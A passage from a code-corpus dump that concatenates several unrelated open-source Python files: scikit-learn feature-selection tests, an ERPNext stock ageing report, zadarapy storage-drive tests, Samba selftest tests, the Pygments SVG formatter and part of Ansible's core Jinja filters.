    step_list = [2, 3]
    for n_features, n_features_to_select, step in zip(
            n_features_list, n_features_to_select_list, step_list):
        generator = check_random_state(43)
        X = generator.normal(size=(100, n_features))
        y = generator.rand(100).round()
        rfe = RFE(estimator=SVC(kernel="linear"),
                  n_features_to_select=n_features_to_select, step=step)
        rfe.fit(X, y)
        # this number also equals to the maximum of ranking_
        assert_equal(np.max(rfe.ranking_),
                     formula1(n_features, n_features_to_select, step))
        assert_equal(np.max(rfe.ranking_),
                     formula2(n_features, n_features_to_select, step))

    # In RFECV, 'fit' calls 'RFE._fit'
    # 'number_of_subsets_of_features' of RFE
    # = the size of 'grid_scores' of RFECV
    # = the number of iterations of the for loop before optimization #4534
    # RFECV, n_features_to_select = 1
    # Case 1, n_features - 1 is divisible by step
    # Case 2, n_features - 1 is not divisible by step
    n_features_to_select = 1
    n_features_list = [11, 10]
    step_list = [2, 2]
    for n_features, step in zip(n_features_list, step_list):
        generator = check_random_state(43)
        X = generator.normal(size=(100, n_features))
        y = generator.rand(100).round()
        rfecv = RFECV(estimator=SVC(kernel="linear"), step=step, cv=5)
        rfecv.fit(X, y)
        assert_equal(rfecv.grid_scores_.shape[0],
                     formula1(n_features, n_features_to_select, step))
        assert_equal(rfecv.grid_scores_.shape[0],
                     formula2(n_features, n_features_to_select, step))
| bsd-3-clause |
saurabh6790/ON-RISAPP | stock/report/stock_ageing/stock_ageing.py | 29 | 3160 | # Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import webnotes
from webnotes.utils import date_diff
def execute(filters=None):
    """Entry point for the Stock Ageing report.

    Replays the stock ledger into per-item FIFO queues and reports the
    quantity-weighted average, earliest and latest batch ages (in days)
    as of the ``to_date`` filter. Returns (columns, data) as expected by
    the report framework.
    """
    columns = get_columns()
    item_details = get_fifo_queue(filters)
    to_date = filters["to_date"]
    data = []
    for item, item_dict in item_details.items():
        fifo_queue = item_dict["fifo_queue"]
        details = item_dict["details"]
        # items whose stock was fully consumed have an empty queue: skip
        if not fifo_queue: continue
        average_age = get_average_age(fifo_queue, to_date)
        # queue is chronological, so head = oldest batch, tail = newest
        earliest_age = date_diff(to_date, fifo_queue[0][1])
        latest_age = date_diff(to_date, fifo_queue[-1][1])
        data.append([item, details.item_name, details.description, details.item_group,
            details.brand, average_age, earliest_age, latest_age, details.stock_uom])
    return columns, data
def get_average_age(fifo_queue, to_date):
    """Return the quantity-weighted mean age (in days) of the FIFO batches.

    Each batch is a [qty, posting_date] pair; a batch's age is measured
    from its posting date up to *to_date*. Returns 0.0 for an empty queue
    or zero total quantity.
    """
    weighted_age = 0.0
    total_qty = 0.0
    for qty, posting_date in fifo_queue:
        weighted_age += qty * date_diff(to_date, posting_date)
        total_qty += qty
    return weighted_age / total_qty if total_qty else 0.0
def get_columns():
    """Column definitions for the Stock Ageing report ("label:type:width")."""
    return [
        "Item Code:Link/Item:100",
        "Item Name::100",
        "Description::200",
        "Item Group:Link/Item Group:100",
        "Brand:Link/Brand:100",
        "Average Age:Float:100",
        "Earliest:Int:80",
        "Latest:Int:80",
        "UOM:Link/UOM:100",
    ]
def get_fifo_queue(filters):
    """Replay the stock ledger chronologically into per-item FIFO queues.

    Returns ``{item_code: {"details": ledger_row,
                           "fifo_queue": [[qty, posting_date], ...]}}``.
    Positive quantities open a new batch at the tail; negative quantities
    consume batches from the head (first-in, first-out).
    """
    item_details = {}
    for d in get_stock_ledger_entries(filters):
        item_details.setdefault(d.name, {"details": d, "fifo_queue": []})
        fifo_queue = item_details[d.name]["fifo_queue"]
        if d.actual_qty > 0:
            # receipt: append a fresh batch
            fifo_queue.append([d.actual_qty, d.posting_date])
        else:
            # issue: consume from the head of the queue
            qty_to_pop = abs(d.actual_qty)
            while qty_to_pop:
                # NOTE(review): when the queue is exhausted the dummy
                # [0, None] batch absorbs the remainder, so issues beyond
                # available stock are silently dropped — TODO confirm intended
                batch = fifo_queue[0] if fifo_queue else [0, None]
                if 0 < batch[0] <= qty_to_pop:
                    # if batch qty > 0
                    # not enough or exactly same qty in current batch, clear batch
                    qty_to_pop -= batch[0]
                    fifo_queue.pop(0)
                else:
                    # all from current batch
                    batch[0] -= qty_to_pop
                    qty_to_pop = 0
    return item_details
def get_stock_ledger_entries(filters):
    """Fetch stock ledger rows (joined with the item master) up to
    ``to_date``, ordered chronologically so the FIFO replay is correct.

    Filter values are bound via pyformat placeholders; only the optional
    WHERE fragments are interpolated, and those contain placeholders only.
    """
    return webnotes.conn.sql("""select
            item.name, item.item_name, item_group, brand, description, item.stock_uom,
            actual_qty, posting_date
        from `tabStock Ledger Entry` sle,
            (select name, item_name, description, stock_uom, brand, item_group
                from `tabItem` {item_conditions}) item
        where item_code = item.name and
            company = %(company)s and
            posting_date <= %(to_date)s
            {sle_conditions}
            order by posting_date, posting_time, sle.name"""\
        .format(item_conditions=get_item_conditions(filters),
            sle_conditions=get_sle_conditions(filters)), filters, as_dict=True)
def get_item_conditions(filters):
    """Build the WHERE clause for the `tabItem` sub-query.

    Only filters that are present contribute a condition; values are
    bound via pyformat placeholders, never interpolated directly.
    Returns "" when no item filter is set.
    """
    clauses = [
        "{0}=%({0})s".format(field)
        for field in ("item_code", "brand")
        if filters.get(field)
    ]
    if not clauses:
        return ""
    return "where {}".format(" and ".join(clauses))
def get_sle_conditions(filters):
    """Extra WHERE fragment (prefixed with "and") for the ledger query.

    Currently only the optional warehouse filter is supported; the value
    is bound via a pyformat placeholder. Returns "" when unset.
    """
    if filters.get("warehouse"):
        return "and warehouse=%(warehouse)s"
    return ""
zadarastorage/zadarapy | tests/vpsa/test_00_drives.py | 1 | 2974 | # Copyright 2019 Zadara Storage, Inc.
# Originally authored by Jeremy Brown - https://github.com/jwbrown77
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy
# of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import uuid
from zadarapy.validators import is_valid_volume_id
from zadarapy.vpsa.drives import get_free_drives, get_drive, rename_drive, \
get_drive_performance, cancel_shred_drive, shred_drive
def test_get_all_drives(all_drives):
    """Every drive listed by the VPSA must carry a valid volume id."""
    assert all_drives['response']['count'] >= 2
    for drive in all_drives['response']['disks']:
        assert is_valid_volume_id(drive['name'])
def test_get_free_drives(zsession):
    """Free drives must not be assigned to any RAID group."""
    free_drives = get_free_drives(zsession)
    for drive in free_drives['response']['disks']:
        assert drive['raid_group_name'] is None
def test_get_drive(zsession, all_drives):
    """Fetching a single drive by id returns a record with a valid id."""
    drive = get_drive(zsession, all_drives['response']['disks'][0]['name'])
    assert is_valid_volume_id(drive['response']['disk']['name'])
def test_rename_drive(zsession, all_drives):
    """Renaming a drive updates its display name."""
    # random name avoids collisions with earlier runs on the same VPSA
    new_name = str(uuid.uuid4())
    rename_drive(zsession, all_drives['response']['disks'][0]['name'],
                 new_name)
    drive = get_drive(zsession, all_drives['response']['disks'][0]['name'])
    name = drive['response']['disk']['display_name']
    assert name == new_name
# def test_remove_drive(zsession, all_drives):
# drive_id = all_drives['response']['disks'][-1]['name']
#
# remove_drive(zsession, drive_id)
#
# drives = get_all_drives(zsession)
#
# for drive in drives['response']['disks']:
# assert not drive['name'] == drive_id
def test_shred_drive(zsession, all_drives):
    """Starting a shred moves the drive into a 'Shredding' status."""
    drive_id = all_drives['response']['disks'][0]['name']
    shred_drive(zsession, drive_id)
    drive = get_drive(zsession, all_drives['response']['disks'][0]['name'])
    status = drive['response']['disk']['status']
    assert status.startswith('Shredding')
def test_cancel_shred_drive(zsession, all_drives):
    """Cancelling the shred started by the previous test clears the
    'Shredding' status."""
    drive_id = all_drives['response']['disks'][0]['name']
    cancel_shred_drive(zsession, drive_id)
    drive = get_drive(zsession, all_drives['response']['disks'][0]['name'])
    status = drive['response']['disk']['status']
    assert not status.startswith('Shredding')
def test_get_drive_performance(zsession, all_drives):
    """The reported usage count must match the number of usage samples."""
    drive_id = all_drives['response']['disks'][0]['name']
    performance = get_drive_performance(zsession, drive_id)
    num_of_usages = len(performance['response']['usages'])
    assert performance['response']['count'] == num_of_usages
| apache-2.0 |
jkstrick/samba | selftest/tests/test_samba.py | 20 | 2864 | # test_run.py -- Tests for selftest.target.samba
# Copyright (C) 2012 Jelmer Vernooij <jelmer@samba.org>
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; version 3
# of the License or (at your option) any later version of
# the License.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301, USA.
"""Tests for selftest.target.samba."""
from cStringIO import StringIO
from samba.tests import TestCase
from selftest.target.samba import (
bindir_path,
get_interface,
mk_realms_stanza,
write_krb5_conf,
)
class BinDirPathTests(TestCase):
    """Tests for bindir_path()."""

    def test_mapping(self):
        self.assertEquals("exe",
            bindir_path("/some/path", "exe"))
        self.assertEquals("/bin/exe",
            bindir_path("/bin", "/bin/exe"))

    def test_no_mapping(self):
        # names with no mapping entry fall back to bindir-relative lookup
        # when the file exists there — presumably; TODO confirm against
        # selftest.target.samba.bindir_path
        self.assertEqual("exe", bindir_path("/some/path", "exe"))
        self.assertEqual("/bin/ls",
            bindir_path("/bin", "ls"))
class MkRealmsStanzaTests(TestCase):
    """Tests for mk_realms_stanza()."""

    def test_basic(self):
        # one [realms] entry per name (realm, dns name, domain), all
        # pointing at the same KDC address on port 88
        self.assertEqual(
            mk_realms_stanza("rijk", "dnsnaam", "domein", "ipv4_kdc"),
            '''\
rijk = {
 kdc = ipv4_kdc:88
 admin_server = ipv4_kdc:88
 default_domain = dnsnaam
}
dnsnaam = {
 kdc = ipv4_kdc:88
 admin_server = ipv4_kdc:88
 default_domain = dnsnaam
}
domein = {
 kdc = ipv4_kdc:88
 admin_server = ipv4_kdc:88
 default_domain = dnsnaam
}
''')
class WriteKrb5ConfTests(TestCase):
    """Tests for write_krb5_conf()."""

    def test_simple(self):
        # write_krb5_conf() should emit a complete krb5.conf with
        # [libdefaults] and a [realms] stanza per name
        f = StringIO()
        write_krb5_conf(f, "rijk", "dnsnaam", "domein", "kdc_ipv4")
        self.assertEquals('''\
#Generated krb5.conf for rijk
[libdefaults]
\tdefault_realm = rijk
\tdns_lookup_realm = false
\tdns_lookup_kdc = false
\tticket_lifetime = 24h
\tforwardable = yes
\tallow_weak_crypto = yes
[realms]
rijk = {
 kdc = kdc_ipv4:88
 admin_server = kdc_ipv4:88
 default_domain = dnsnaam
}
dnsnaam = {
 kdc = kdc_ipv4:88
 admin_server = kdc_ipv4:88
 default_domain = dnsnaam
}
domein = {
 kdc = kdc_ipv4:88
 admin_server = kdc_ipv4:88
 default_domain = dnsnaam
}
''', f.getvalue())
class GetInterfaceTests(TestCase):
    """Tests for get_interface()."""

    def test_get_interface(self):
        # known environment names map to fixed interface numbers
        self.assertEquals(21, get_interface("localdc"))
        self.assertEquals(4, get_interface("localshare4"))

    def test_unknown(self):
        # unknown names raise KeyError
        self.assertRaises(KeyError, get_interface, "unknown")
| gpl-3.0 |
morpheyesh/ghostblog | node_modules/grunt-docker/node_modules/docker/node_modules/pygmentize-bundled/vendor/pygments/build-3.3/pygments/formatters/svg.py | 362 | 5867 | # -*- coding: utf-8 -*-
"""
pygments.formatters.svg
~~~~~~~~~~~~~~~~~~~~~~~
Formatter for SVG output.
:copyright: Copyright 2006-2013 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
from pygments.formatter import Formatter
from pygments.util import get_bool_opt, get_int_opt
__all__ = ['SvgFormatter']
def escape_html(text):
    """Escape &, <, > as well as single and double quotes for HTML."""
    replacements = {
        '&': '&amp;',
        '<': '&lt;',
        '>': '&gt;',
        '"': '&quot;',
        "'": '&#39;',
    }
    # single pass over the input; untouched characters pass through as-is
    return ''.join(replacements.get(ch, ch) for ch in text)
# NOTE(review): nothing in this module reads or writes `class2style`;
# it looks like dead code kept for backwards compatibility — TODO confirm
# before removing.
class2style = {}
class SvgFormatter(Formatter):
    """
    Format tokens as an SVG graphics file. This formatter is still experimental.
    Each line of code is a ``<text>`` element with explicit ``x`` and ``y``
    coordinates containing ``<tspan>`` elements with the individual token styles.

    By default, this formatter outputs a full SVG document including doctype
    declaration and the ``<svg>`` root element.

    *New in Pygments 0.9.*

    Additional options accepted:

    `nowrap`
        Don't wrap the SVG ``<text>`` elements in ``<svg><g>`` elements and
        don't add a XML declaration and a doctype. If true, the `fontfamily`
        and `fontsize` options are ignored. Defaults to ``False``.

    `fontfamily`
        The value to give the wrapping ``<g>`` element's ``font-family``
        attribute, defaults to ``"monospace"``.

    `fontsize`
        The value to give the wrapping ``<g>`` element's ``font-size``
        attribute, defaults to ``"14px"``.

    `xoffset`
        Starting offset in X direction, defaults to ``0``.

    `yoffset`
        Starting offset in Y direction, defaults to the font size if it is given
        in pixels, or ``20`` else. (This is necessary since text coordinates
        refer to the text baseline, not the top edge.)

    `ystep`
        Offset to add to the Y coordinate for each subsequent line. This should
        roughly be the text size plus 5. It defaults to that value if the text
        size is given in pixels, or ``25`` else.

    `spacehack`
        Convert spaces in the source to ``&#160;``, which are non-breaking
        spaces. SVG provides the ``xml:space`` attribute to control how
        whitespace inside tags is handled, in theory, the ``preserve`` value
        could be used to keep all whitespace as-is. However, many current SVG
        viewers don't obey that rule, so this option is provided as a workaround
        and defaults to ``True``.
    """
    name = 'SVG'
    aliases = ['svg']
    filenames = ['*.svg']

    def __init__(self, **options):
        # XXX outencoding
        Formatter.__init__(self, **options)
        self.nowrap = get_bool_opt(options, 'nowrap', False)
        self.fontfamily = options.get('fontfamily', 'monospace')
        self.fontsize = options.get('fontsize', '14px')
        self.xoffset = get_int_opt(options, 'xoffset', 0)
        fs = self.fontsize.strip()
        if fs.endswith('px'): fs = fs[:-2].strip()
        try:
            int_fs = int(fs)
        except:
            # NOTE(review): bare except silently falls back to 20 for any
            # non-numeric font size; an explicit ValueError would be safer
            int_fs = 20
        self.yoffset = get_int_opt(options, 'yoffset', int_fs)
        self.ystep = get_int_opt(options, 'ystep', int_fs + 5)
        self.spacehack = get_bool_opt(options, 'spacehack', True)
        # memoizes token type -> tspan attribute string (see _get_style)
        self._stylecache = {}

    def format_unencoded(self, tokensource, outfile):
        """
        Format ``tokensource``, an iterable of ``(tokentype, tokenstring)``
        tuples and write it into ``outfile``.

        For our implementation we put all lines in their own 'line group'.
        """
        x = self.xoffset
        y = self.yoffset
        if not self.nowrap:
            # emit the XML prolog, doctype and the wrapping <svg><g> pair
            if self.encoding:
                outfile.write('<?xml version="1.0" encoding="%s"?>\n' %
                              self.encoding)
            else:
                outfile.write('<?xml version="1.0"?>\n')
            outfile.write('<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.0//EN" '
                          '"http://www.w3.org/TR/2001/REC-SVG-20010904/DTD/'
                          'svg10.dtd">\n')
            outfile.write('<svg xmlns="http://www.w3.org/2000/svg">\n')
            outfile.write('<g font-family="%s" font-size="%s">\n' %
                          (self.fontfamily, self.fontsize))
        outfile.write('<text x="%s" y="%s" xml:space="preserve">' % (x, y))
        for ttype, value in tokensource:
            style = self._get_style(ttype)
            tspan = style and '<tspan' + style + '>' or ''
            tspanend = tspan and '</tspan>' or ''
            value = escape_html(value)
            if self.spacehack:
                # non-breaking spaces; see the `spacehack` option above
                value = value.expandtabs().replace(' ', '&#160;')
            parts = value.split('\n')
            for part in parts[:-1]:
                # each newline ends the current <text> and starts a new one
                # at the next ystep
                outfile.write(tspan + part + tspanend)
                y += self.ystep
                outfile.write('</text>\n<text x="%s" y="%s" '
                              'xml:space="preserve">' % (x, y))
            outfile.write(tspan + parts[-1] + tspanend)
        outfile.write('</text>')

        if not self.nowrap:
            outfile.write('</g></svg>\n')

    def _get_style(self, tokentype):
        # Return the tspan attribute string for a token type, walking up
        # the token hierarchy until a styled ancestor is found. Results
        # are cached per original token type.
        if tokentype in self._stylecache:
            return self._stylecache[tokentype]
        otokentype = tokentype
        while not self.style.styles_token(tokentype):
            tokentype = tokentype.parent
        value = self.style.style_for_token(tokentype)
        result = ''
        if value['color']:
            result = ' fill="#' + value['color'] + '"'
        if value['bold']:
            result += ' font-weight="bold"'
        if value['italic']:
            result += ' font-style="italic"'
        self._stylecache[otokentype] = result
        return result
| mit |
KyleJamesWalker/ansible | lib/ansible/plugins/filter/core.py | 5 | 16905 | # (c) 2012, Jeroen Hoekx <jeroen@hoekx.be>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import base64
import crypt
import glob
import hashlib
import itertools
import json
import ntpath
import os.path
import re
import string
import sys
import uuid
from datetime import datetime
from functools import partial
from random import Random, SystemRandom, shuffle
import yaml
from jinja2.filters import environmentfilter, do_groupby as _do_groupby
try:
import passlib.hash
HAS_PASSLIB = True
except:
HAS_PASSLIB = False
from ansible import errors
from ansible.module_utils.six import iteritems, string_types, integer_types
from ansible.module_utils.six.moves import reduce, shlex_quote
from ansible.module_utils._text import to_bytes, to_text
from ansible.parsing.yaml.dumper import AnsibleDumper
from ansible.utils.hashing import md5s, checksum_s
from ansible.utils.unicode import unicode_wrap
from ansible.utils.vars import merge_hash
from ansible.vars.hostvars import HostVars
UUID_NAMESPACE_ANSIBLE = uuid.UUID('361E6D51-FAEC-444A-9079-341386DA8E2E')
class AnsibleJSONEncoder(json.JSONEncoder):
    '''
    Simple encoder class to deal with JSON encoding of internal
    types like HostVars
    '''
    def default(self, o):
        # HostVars is a lazy mapping; materialize it into a plain dict so the
        # stock JSON machinery can serialize it.
        if isinstance(o, HostVars):
            return dict(o)
        else:
            # Delegate to the base encoder, which raises TypeError for
            # genuinely unserializable objects.
            return super(AnsibleJSONEncoder, self).default(o)
def to_yaml(a, *args, **kw):
    '''Make verbose, human readable yaml'''
    # AnsibleDumper knows how to serialize Ansible's internal string subclasses.
    # NOTE(review): positional *args are accepted but silently ignored.
    transformed = yaml.dump(a, Dumper=AnsibleDumper, allow_unicode=True, **kw)
    return to_text(transformed)
def to_nice_yaml(a, indent=4, *args, **kw):
    '''Make verbose, human readable yaml'''
    # Block style (default_flow_style=False) with configurable indentation.
    # NOTE(review): positional *args are accepted but silently ignored.
    transformed = yaml.dump(a, Dumper=AnsibleDumper, indent=indent, allow_unicode=True, default_flow_style=False, **kw)
    return to_text(transformed)
def to_json(a, *args, **kw):
    ''' Convert the value to JSON '''
    # AnsibleJSONEncoder handles internal types (e.g. HostVars) that the
    # stock encoder rejects.
    return json.dumps(a, cls=AnsibleJSONEncoder, *args, **kw)
def to_nice_json(a, indent=4, *args, **kw):
    '''Make verbose, human readable JSON'''
    # python-2.6's json encoder is buggy (can't encode hostvars), so prefer a
    # sufficiently new simplejson there if one is installed.
    if sys.version_info < (2, 7):
        try:
            import simplejson
        except ImportError:
            pass
        else:
            try:
                major = int(simplejson.__version__.split('.')[0])
            except (AttributeError, ValueError):
                # No usable version string; fall through to the stdlib encoder.
                pass
            else:
                if major >= 2:
                    return simplejson.dumps(a, indent=indent, sort_keys=True, *args, **kw)
    try:
        return json.dumps(a, indent=indent, sort_keys=True, cls=AnsibleJSONEncoder, *args, **kw)
    except Exception:
        # Fallback to the to_json filter (compact, no sorting) for values the
        # pretty encoder cannot handle.
        return to_json(a, *args, **kw)
def to_bool(a):
    ''' return a bool for the arg '''
    # None and real booleans pass through unchanged; callers rely on None
    # meaning "unset", so it must not be coerced to False.
    if a is None or isinstance(a, bool):
        return a
    if isinstance(a, string_types):
        a = a.lower()
    # Anything outside the known truthy set is treated as False.
    return a in ('yes', 'on', '1', 'true', 1)
def to_datetime(string, format="%Y-%d-%m %H:%M:%S"):
    """Parse *string* into a :class:`datetime.datetime` using *format*.

    Note the unusual default field order: year, then DAY, then month.
    """
    return datetime.strptime(string, format)
def quote(a):
    ''' return its argument quoted for shell usage '''
    # shlex_quote is six's shim for shlex.quote (py3) / pipes.quote (py2).
    return shlex_quote(a)
def fileglob(pathname):
    ''' return list of matched regular files for glob '''
    # Directories and other non-regular entries matched by the glob are dropped.
    matches = glob.glob(pathname)
    return [path for path in matches if os.path.isfile(path)]
def regex_replace(value='', pattern='', replacement='', ignorecase=False):
    ''' Perform a `re.sub` returning a string '''
    # Normalize the input to text first; non-strings are repr()'d rather than
    # raising, so the filter is safe to chain.
    value = to_text(value, errors='surrogate_or_strict', nonstring='simplerepr')
    if ignorecase:
        flags = re.I
    else:
        flags = 0
    _re = re.compile(pattern, flags=flags)
    return _re.sub(replacement, value)
def regex_findall(value, regex, multiline=False, ignorecase=False):
    ''' Perform re.findall and return the list of matches '''
    flags = (re.I if ignorecase else 0) | (re.M if multiline else 0)
    return re.findall(regex, value, flags)
def regex_search(value, regex, *args, **kwargs):
    ''' Perform re.search and return the list of matches or a backref '''
    # Positional args select backreferences: '\g<name>' for named groups,
    # '\N' for numbered groups.
    backrefs = []
    for arg in args:
        if arg.startswith('\\g'):
            backrefs.append(re.match(r'\\g<(\S+)>', arg).group(1))
        elif arg.startswith('\\'):
            backrefs.append(int(re.match(r'\\(\d+)', arg).group(1)))
        else:
            raise errors.AnsibleFilterError('Unknown argument')

    flags = 0
    if kwargs.get('ignorecase'):
        flags |= re.I
    if kwargs.get('multiline'):
        flags |= re.M

    found = re.search(regex, value, flags)
    if found is None:
        # Mirrors the implicit None of the original: no match, no result.
        return None
    if not backrefs:
        return found.group()
    return [found.group(ref) for ref in backrefs]
def ternary(value, true_val, false_val):
    ''' value ? true_val : false_val '''
    return true_val if value else false_val
def regex_escape(string):
    '''Escape all regular expressions special characters from STRING.'''
    escaped = re.escape(string)
    return escaped
def from_yaml(data):
    # Only parse actual strings; already-structured data passes through, so
    # the filter is idempotent when chained.
    if isinstance(data, string_types):
        return yaml.safe_load(data)
    return data
@environmentfilter
def rand(environment, end, start=None, step=None, seed=None):
    """Jinja filter: a random integer from range(start, end, step) when *end*
    is an integer, otherwise a random element of the sequence *end*.
    Passing *seed* makes the result reproducible."""
    if seed is None:
        r = SystemRandom()  # OS entropy: strong but not reproducible
    else:
        r = Random(seed)    # deterministic stream for a given seed
    if isinstance(end, integer_types):
        # NOTE(review): falsy start/step (0) are replaced with the defaults,
        # which happens to coincide with the intended defaults here.
        if not start:
            start = 0
        if not step:
            step = 1
        return r.randrange(start, end, step)
    elif hasattr(end, '__iter__'):
        if start or step:
            raise errors.AnsibleFilterError('start and step can only be used with integer values')
        return r.choice(end)
    else:
        raise errors.AnsibleFilterError('random can only be used on sequences and integers')
def randomize_list(mylist, seed=None):
    """Return a shuffled copy of *mylist*; with *seed* the order is reproducible.

    Best-effort: input that cannot be turned into a list is returned unchanged.
    """
    try:
        mylist = list(mylist)
        # NOTE(review): a falsy seed (0, '') is treated as "no seed" -- confirm intended.
        if seed:
            r = Random(seed)
            r.shuffle(mylist)
        else:
            shuffle(mylist)
    except Exception:
        # Narrowed from a bare except: still best-effort, but no longer
        # swallows KeyboardInterrupt/SystemExit.
        pass
    return mylist
def get_hash(data, hashtype='sha1'):
    """Return the hex digest of *data* using *hashtype*, or None when the
    algorithm is not available."""
    try:  # see if hash is supported
        h = hashlib.new(hashtype)
    except Exception:
        # hashlib.new raises ValueError for unknown algorithms (TypeError for
        # non-string names); narrowed from a bare except.
        return None
    h.update(to_bytes(data, errors='surrogate_then_strict'))
    return h.hexdigest()
def get_encrypted_password(password, hashtype='sha512', salt=None):
    """Return a crypt(3)-style password hash, or None for unknown hashtypes.

    Uses passlib when available, otherwise the platform's crypt().  A random
    alphanumeric salt is generated when none is supplied.
    """
    # TODO: find a way to construct dynamically from system
    # Map of supported scheme names to their crypt(3) method identifiers.
    cryptmethod= {
        'md5': '1',
        'blowfish': '2a',
        'sha256': '5',
        'sha512': '6',
    }

    if hashtype in cryptmethod:
        if salt is None:
            r = SystemRandom()
            # md5-crypt salts are limited to 8 chars; the others take 16.
            if hashtype in ['md5']:
                saltsize = 8
            else:
                saltsize = 16
            salt = ''.join([r.choice(string.ascii_letters + string.digits) for _ in range(saltsize)])

        if not HAS_PASSLIB:
            # Darwin's crypt() does not support these schemes, hence the hard error.
            if sys.platform.startswith('darwin'):
                raise errors.AnsibleFilterError('|password_hash requires the passlib python module to generate password hashes on Mac OS X/Darwin')
            saltstring = "$%s$%s" % (cryptmethod[hashtype],salt)
            encrypted = crypt.crypt(password, saltstring)
        else:
            # passlib exposes e.g. sha512_crypt; blowfish maps to bcrypt.
            if hashtype == 'blowfish':
                cls = passlib.hash.bcrypt
            else:
                cls = getattr(passlib.hash, '%s_crypt' % hashtype)
            encrypted = cls.encrypt(password, salt=salt)

        return encrypted

    # Unknown hashtype: signal "no hash" rather than raising.
    return None
def to_uuid(string):
    # uuid5 is namespaced SHA-1: the same input always maps to the same UUID,
    # using Ansible's fixed namespace constant.
    return str(uuid.uuid5(UUID_NAMESPACE_ANSIBLE, str(string)))
def mandatory(a):
    ''' Make a variable mandatory '''
    # The docstring must be the first statement; previously it sat after this
    # import and was a dead string literal, not a docstring.
    # Imported lazily so jinja2 stays a runtime-only dependency here.
    from jinja2.runtime import Undefined

    if isinstance(a, Undefined):
        raise errors.AnsibleFilterError('Mandatory variable not defined.')
    return a
def combine(*terms, **kwargs):
    """Merge the given dictionaries left-to-right.

    With recursive=True nested dicts are deep-merged (merge_hash); otherwise
    later keys simply overwrite earlier ones.
    """
    recursive = kwargs.get('recursive', False)
    if len(kwargs) > 1 or (len(kwargs) == 1 and 'recursive' not in kwargs):
        raise errors.AnsibleFilterError("'recursive' is the only valid keyword argument")

    for t in terms:
        if not isinstance(t, dict):
            raise errors.AnsibleFilterError("|combine expects dictionaries, got " + repr(t))

    if recursive:
        return reduce(merge_hash, terms)
    else:
        # Shallow merge: flatten all (key, value) pairs; last wins.
        return dict(itertools.chain(*map(iteritems, terms)))
def comment(text, style='plain', **kw):
    """Decorate *text* as a comment block in the given *style*.

    Supported styles: plain, erlang, c, cblock, xml.  Any layout parameter
    (beginning, decoration, end, prefix, postfix, newline, ...) can be
    overridden via keyword arguments.
    """
    # Predefined comment types
    comment_styles = {
        'plain': {
            'decoration': '# '
        },
        'erlang': {
            'decoration': '% '
        },
        'c': {
            'decoration': '// '
        },
        'cblock': {
            'beginning': '/*',
            'decoration': ' * ',
            'end': ' */'
        },
        'xml': {
            'beginning': '<!--',
            'decoration': ' - ',
            'end': '-->'
        }
    }

    # Pointer to the right comment type
    style_params = comment_styles[style]

    if 'decoration' in kw:
        prepostfix = kw['decoration']
    else:
        prepostfix = style_params['decoration']

    # Default params
    p = {
        'newline': '\n',
        'beginning': '',
        'prefix': (prepostfix).rstrip(),
        'prefix_count': 1,
        'decoration': '',
        'postfix': (prepostfix).rstrip(),
        'postfix_count': 1,
        'end': ''
    }

    # Update default params
    p.update(style_params)
    p.update(kw)

    # Compose substrings for the final string
    str_beginning = ''
    if p['beginning']:
        str_beginning = "%s%s" % (p['beginning'], p['newline'])
    str_prefix = ''
    if p['prefix']:
        if p['prefix'] != p['newline']:
            str_prefix = str(
                "%s%s" % (p['prefix'], p['newline'])) * int(p['prefix_count'])
        else:
            str_prefix = str(
                "%s" % (p['newline'])) * int(p['prefix_count'])
    str_text = ("%s%s" % (
        p['decoration'],
        # Prepend each line of the text with the decorator
        text.replace(
            p['newline'], "%s%s" % (p['newline'], p['decoration'])))).replace(
            # Remove trailing spaces when only decorator is on the line
            "%s%s" % (p['decoration'], p['newline']),
            "%s%s" % (p['decoration'].rstrip(), p['newline']))
    str_postfix = p['newline'].join(
        [''] + [p['postfix'] for x in range(p['postfix_count'])])
    str_end = ''
    if p['end']:
        str_end = "%s%s" % (p['newline'], p['end'])

    # Return the final string
    return "%s%s%s%s%s" % (
        str_beginning,
        str_prefix,
        str_text,
        str_postfix,
        str_end)
def extract(item, container, morekeys=None):
    """Look up container[item], optionally descending through *morekeys*.

    Missing sub-keys yield a jinja2 Undefined instead of raising.
    """
    from jinja2.runtime import Undefined

    value = container[item]
    # NOTE(review): 'value is not Undefined' compares against the Undefined
    # *class* object, so it is effectively always True for real values;
    # isinstance(value, Undefined) may have been intended -- confirm.
    if value is not Undefined and morekeys is not None:
        if not isinstance(morekeys, list):
            morekeys = [morekeys]

        try:
            # Descend one key at a time: value[k1][k2]...
            value = reduce(lambda d, k: d[k], morekeys, value)
        except KeyError:
            value = Undefined()

    return value
def failed(*a, **kw):
    ''' Test if task result yields failed '''
    item = a[0]
    # isinstance instead of type() ==; also accepts dict subclasses.
    if not isinstance(item, dict):
        raise errors.AnsibleFilterError("|failed expects a dictionary")
    rc = item.get('rc', 0)
    failed = item.get('failed', False)
    # A non-zero return code or an explicit 'failed' flag marks failure.
    return rc != 0 or bool(failed)
def success(*a, **kw):
    ''' Test if task result yields success '''
    # Success is simply the negation of the |failed test.
    return not failed(*a, **kw)
def changed(*a, **kw):
